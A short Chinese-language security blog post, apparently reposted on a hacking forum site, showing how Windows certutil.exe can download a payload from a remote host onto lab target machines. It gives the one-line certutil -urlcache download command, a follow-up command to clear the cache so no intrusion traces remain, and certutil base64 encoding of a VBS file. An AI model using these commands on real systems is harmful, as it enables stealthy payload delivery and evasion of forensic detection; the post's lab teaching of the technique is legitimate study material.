Certutil 一句话下载 Payload

华盟原创文章投稿奖励计划

certutil微软官方是这样对它解释的:

Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书,密钥对和证书链。

url:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732443(v=ws.11)

但是近些年好像被玩坏了。

靶机:windows 2003 windows 7
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt

Certutil 一句话下载 Payload

默认下载为bin文件。但是不影响在命令行下使用。

Certutil 一句话下载 Payload

certutil.exe下载有个弊端,它的每一次下载都有留有缓存,而导致留下入侵痕迹,所以每次下载后,需要马上执行如下:
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete

Windows 2003:
Certutil 一句话下载 Payload
Windows 7:
Certutil 一句话下载 Payload
certutil的其它高级应用:
C:>certutil  -encode c:downfile.vbs downfile.bat
Certutil 一句话下载 Payload
file:downfile.bat
Certutil 一句话下载 Payload

解密:
Certutil 一句话下载 Payload
file:downfile.txt
Certutil 一句话下载 Payload
后者的话:

powershell内存加载配合certutil解密是一件非常有趣的事情。会在未来的系列中讲述。

华盟知识星球入口

作者:Micropoor
链接:https://micropoor.blogspot.com

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/243251.html

发表评论